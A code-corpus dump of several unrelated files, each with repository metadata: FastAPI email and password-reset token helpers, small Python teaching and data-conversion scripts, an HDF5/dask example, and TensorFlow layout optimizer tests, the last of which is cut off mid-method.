] | permissive | aydinmemis/blog_FastAPI | e42a6c4f5a9c64154da0f9a23290c274b305838a | f584634a2cd410904df6a7d9478044d269737a91 | refs/heads/master | 2022-04-06T12:37:59.068303 | 2020-03-11T18:04:14 | 2020-03-11T18:04:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,688 | py | import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
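# Subject claim stamped into password-reset tokens; verify_password_reset_token()
# below asserts this same value when decoding.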
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
return decoded_token["email"]
except InvalidTokenError:
return None
| [
"[email protected]"
] | |
f59676ae9eac334e4b46372346f1f0b0d5844c4e | c60c199410289c1d7ec4aea00833b461e1f08f88 | /27-29-nov-2014/day1/stringiter2.py | 027138065a5897ed5823bf0d6c686f23c0a0f2de | [] | no_license | ver007/pythonjumpstart | 66fb111e6af197fad3e853b2c2d712a1b57a7d59 | 5b1f52479abd07456e2da494149e491d398f3b7d | refs/heads/master | 2021-01-21T01:34:35.501870 | 2015-05-13T14:10:13 | 2015-05-13T14:10:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | __author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
| [
"[email protected]"
] | |
8179861a56b00ea0aae727ab31ba65679ea3dcb6 | 5c0e83b07e01983b064980b805e6067cd1123714 | /rd_caltech.py | 81e59b15ea802ee43b2828b30359ef9bfbe9dc85 | [
"MIT"
] | permissive | zyg11/MTCNN-TF | 750ec7b6533b639deba5126e19a434da615585ac | 4d41c5fd2dc13008d39b868aa2e921a7ff731e10 | refs/heads/master | 2020-08-26T14:24:41.084820 | 2019-04-02T09:02:23 | 2019-04-02T09:02:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,656 | py | #author : lxy
#time: 2018.3.23/ 11:30:00
#tool: python3
#version: 0.1
#modify:
#project: pedestrian detection
################################
import numpy as np
import glob
import os
import argparse
def args():
parser = argparse.ArgumentParser(description="read caltech txt")
parser.add_argument('--dir_in',type=str,default="/home/lxy/Downloads/DataSet/trainval/",\
help='annotation files saved dir ')
parser.add_argument('--out_file',type=str,default='train_caltech.txt',\
help='generated outfiles saved')
return parser.parse_args()
def get_fil():
parm = args()
dir_in = parm.dir_in
out_f = parm.out_file
f_wt = open(out_f,'w')
file_txts = glob.glob(dir_in+'annotations/*.txt')
pass_cnt = 0
for file_item in file_txts:
f_rd = open(file_item,'r')
line_list = f_rd.readlines()
if len(line_list)==0:
f_rd.close()
            print("empty file: ",file_item)
pass_cnt+=1
continue
img_split = file_item.split('/')
img_name = img_split[-1][:-4]
img_lists = glob.glob(dir_in+'images/*')
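        # Replace the bare annotation name with the matching image filename
        # (extension included) found under images/, if any.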
for img_one in img_lists:
img_lists_split = img_one.split('/')
img_one_name = img_lists_split[-1]
if img_name in img_one_name:
img_name = img_one_name
f_wt.write("{} ".format(img_name))
for line in line_list:
line = line.strip()
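            # line[1:] skips the first character of each annotation entry
            # (presumably a leading marker or space in this txt format).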
f_wt.write("{} ".format(line[1:]))
f_wt.write("\n")
f_rd.close()
f_wt.close()
print("pass ",pass_cnt)
if __name__=="__main__":
get_fil()
| [
"[email protected]"
] | |
f099e8563d50a673936df3dfddd48a1bcda5b76d | 2b3ed6bef2f569448918b8be72c733614c231fce | /hdf5_example.py | dd3342f3c57d95a4688d33cb9ed830c521fb325f | [] | no_license | jackdbd/dask-playground | 8e67024ba60fbac3ff1ad77b94363731c04c0afd | 721bc234eadf13e9ef24173bbbc9a68761bf1a7c | refs/heads/master | 2021-04-25T19:58:47.303280 | 2017-11-01T12:49:00 | 2017-11-01T12:49:00 | 109,123,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | import os
import h5py
import numpy as np
import dask.array as da
h5file_path = 'myfile.hdf5'
if os.path.exists(h5file_path):
os.unlink(h5file_path)
# create a continuous uniform distribution between 0.0 and 1.0
arr = np.random.random(size=(10000, 2000))
with h5py.File(h5file_path, 'w') as h5f:
h5f.create_dataset('dataset_1', data=arr)
with h5py.File(h5file_path, 'r') as h5f:
dset = h5f['dataset_1'][:]
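    # Note: [:] materialises the whole dataset as an in-memory NumPy array first;
    # passing the h5py dataset object itself to da.from_array would keep it lazy.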
x = da.from_array(dset, chunks=(1000, 1000))
result = x.mean().compute()
    print(result)  # should be pretty close to 0.5
| [
"[email protected]"
] | |
e88f9fca86593c9f58548a9b9ee9d1d925f8edac | d3a836353ff223f76fa005215560bb9a0d5e1250 | /tensorflow/python/grappler/layout_optimizer_test.py | d9c1c3ce41aee5a5a8bac5f9dd164771611413de | [
"Apache-2.0"
] | permissive | jhabikal21/tensorflow | 9ee926adc0217aa379202fd5c714b7c03e4514f6 | 98d20962172301385aae694141801a375debd2bc | refs/heads/master | 2021-07-15T20:10:13.666688 | 2021-06-23T11:12:14 | 2021-06-23T11:12:14 | 117,846,715 | 0 | 0 | null | 2018-01-17T14:22:49 | 2018-01-17T14:22:48 | null | UTF-8 | Python | false | false | 45,939 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Grappler LayoutOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import device_properties_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.layers import convolutional as conv_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import saver as saver_lib
def _weight(shape):
"""Generates a weight of a given shape."""
return random_ops.truncated_normal(shape, seed=0, stddev=0.1)
def _bias(shape):
"""Generates a bias of a given shape."""
return constant_op.constant(0.1, shape=shape)
def _conv2d(x, w):
"""Returns a 2d convolution layer with full stride."""
return nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def _max_pool_2x2(x):
"""Downsamples a feature map by 2X."""
return nn.max_pool(
x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# Taken from tensorflow/examples/tutorials/mnist/mnist_deep.py
def _two_layer_model(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
b_conv1 = _bias([32])
h_conv1 = nn.relu(_conv2d(x_image, w_conv1) + b_conv1)
h_pool1 = _max_pool_2x2(h_conv1)
w_conv2 = _weight([5, 5, 32, 64])
b_conv2 = _bias([64])
h_conv2 = nn.relu(_conv2d(h_pool1, w_conv2) + b_conv2)
h_pool2 = _max_pool_2x2(h_conv2)
return h_pool2
def _model_with_second_port():
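  """Builds a graph that also consumes the second output (batch mean) of fused_batch_norm."""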
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([2, 5, 5, 4], seed=0)
scale = constant_op.constant(0.1, shape=[4])
offset = constant_op.constant(0.3, shape=[4])
y, mean, _ = nn.fused_batch_norm(x, scale, offset)
mul = math_ops.add(y, mean)
output = array_ops.identity(mul)
return output
def _model_with_branch(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
w_conv2 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
c_conv2 = _conv2d(x_image, w_conv2)
add = math_ops.add(c_conv1, c_conv2)
return add
def _model_with_vec_and_4d(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
c_conv1 = _conv2d(x_image, w_conv1)
vector = constant_op.constant(6.4, shape=[32])
add = math_ops.add(c_conv1, vector)
return add
def _loop():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(_two_layer_model, elems, dtype=dtypes.float32)
return outputs
def _loop_with_branch():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_branch, elems, dtype=dtypes.float32)
return outputs
def _loop_with_vec_and_4d():
random_seed.set_random_seed(0)
x1 = random_ops.truncated_normal([1, 784], seed=0)
x2 = random_ops.truncated_normal([1, 784], seed=0)
x3 = random_ops.truncated_normal([1, 784], seed=0)
x4 = random_ops.truncated_normal([1, 784], seed=0)
elems = (x1, x2, x3, x4)
outputs = functional_ops.map_fn(
_model_with_vec_and_4d, elems, dtype=dtypes.float32)
return outputs
def _get_config(layout_optimizer=True):
if layout_optimizer:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.ON)
else:
rewrite_options = rewriter_config_pb2.RewriterConfig(
layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = config_pb2.GraphOptions(
rewrite_options=rewrite_options, build_cost_model=1)
config = config_pb2.ConfigProto(graph_options=graph_options)
return config
def _simple_metagraph(depthwise=False):
random_seed.set_random_seed(0)
x = variables.Variable(random_ops.truncated_normal([1, 200, 200, 3], seed=0))
conv = conv_layers.separable_conv2d if depthwise else conv_layers.conv2d
y = conv(x, 32, [3, 3])
z = conv(y, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(1e-4)
loss = math_ops.reduce_mean(z)
train_op = optimizer.minimize(loss)
graph = ops.get_default_graph()
graph.add_to_collection('train_op', train_op)
meta_graph = saver_lib.export_meta_graph(graph_def=graph.as_graph_def())
return meta_graph
def _get_cluster():
named_device = device_properties_pb2.NamedDevice()
named_device.name = '/GPU:0'
named_device.properties.type = 'GPU'
named_device.properties.environment['architecture'] = '4'
cluster = gcluster.Cluster(devices=[named_device])
return cluster
class LayoutOptimizerTest(test.TestCase):
"""Tests the Grappler layout optimizer."""
def _train(self, checkpoint_path, layout_optimizer=False, restore=False):
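    """Runs a small two-conv-layer training loop; saves a checkpoint, or restores one and returns the variable values."""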
ops.reset_default_graph()
graph = ops.get_default_graph()
with session.Session(
config=_get_config(layout_optimizer), graph=graph) as sess:
batch = 2
height = 6
width = 7
input_channels = 3
shape = [batch, height, width, input_channels]
image = array_ops.placeholder(dtype='float32', shape=shape)
conv1 = conv_layers.conv2d(image, 32, [3, 3])
conv2 = conv_layers.conv2d(conv1, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
loss = math_ops.reduce_mean(conv2)
train_op = optimizer.minimize(loss)
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)
if restore:
saver.restore(sess, checkpoint_path)
else:
sess.run(variables.global_variables_initializer())
np.random.seed(0)
for _ in range(2):
image_val = np.random.rand(*shape).astype(np.float32)
sess.run([loss, train_op], feed_dict={image: image_val})
if restore:
all_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
all_vars_values = [var.eval(session=sess) for var in all_vars]
return all_vars_values
else:
saver.save(sess, checkpoint_path)
def testTwoConvLayers(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
output = _two_layer_model(x)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Relu_1-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
split = array_ops.split(conv, 2, axis=dim)
output = math_ops.reduce_sum(split[0])
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-split-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_split_0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitVWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
sizes = constant_op.constant([50, 10, 4], shape=[3])
split = gen_array_ops._split_v(
value=conv, size_splits=sizes, axis=dim, num_split=3)
output = math_ops.reduce_sum(split[0])
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-SplitV-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_SplitV_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
paddings = constant_op.constant(
paddings_val, dtype='int32', name='PaddingsConst')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Pad-0-0', nodes)
self.assertIn('LayoutOptimizer-Pad-PaddingsConst', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSum(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv)
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHWC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2, 3])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3])
output = array_ops.identity(reduce_sum)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testConcatWithControlDependency(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
axis = constant_op.constant(3)
var = variables.Variable(3)
assign = state_ops.assign(var, 6)
with ops.control_dependencies([assign]):
concat = array_ops.concat([conv, conv], axis)
output = array_ops.identity(concat)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-concat-0-0', nodes)
self.assertIn('LayoutOptimizer-concat-Const_2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testFill(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shape = array_ops.shape(conv)
scalar = array_ops.constant(5.7)
fill = array_ops.fill(shape, scalar)
output = array_ops.identity(fill)
x_val = [3.4] * 784
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
num_vec_permute = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
if node.name.startswith('LayoutOptimizerVecPermute'):
num_vec_permute += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
# Two vector permute nodes were initially added in the Expand phase of
# LayoutOptimizer; they cancelled out each other in the Collapse phase.
expected_vec_permute = 0
self.assertEqual(expected_vec_permute, num_vec_permute)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Fill-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testTile(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
multiple = array_ops.placeholder(dtype='int32')
tile = array_ops.tile(conv, multiple)
output = array_ops.identity(tile)
multiple_val = [2, 3, 4, 1]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={multiple: multiple_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
multiple: multiple_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Tile-0-0', nodes)
self.assertIn('LayoutOptimizerVecPermuteNHWCToNCHW_Tile_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = constant_op.constant([3, 1], name='DimsConst')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-ReverseV2-0-0', nodes)
self.assertIn('LayoutOptimizer-ReverseV2-DimsConst', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithNonConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = array_ops.placeholder(dtype='int32')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
dims_val = [2, 3]
with session.Session() as sess:
output_val_ref = sess.run(output, feed_dict={dims: dims_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
dims: dims_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-ReverseV2-0-0', nodes)
self.assertIn('LayoutOptimizerDimMapNHWCToNCHW_ReverseV2_1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOp(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
mean = math_ops.reduce_mean(conv)
condition = math_ops.less(conv, mean)
select = gen_math_ops._select(condition, conv, add)
output = array_ops.identity(select)
with session.Session() as sess:
output_val_ref = sess.run(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if node.name.startswith('LayoutOptimizerTranspose'):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self.assertIn('LayoutOptimizerTransposeNHWCToNCHW-Conv2D-0', nodes)
self.assertIn('LayoutOptimizerTransposeNCHWToNHWC-Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpScalarCondition(self):
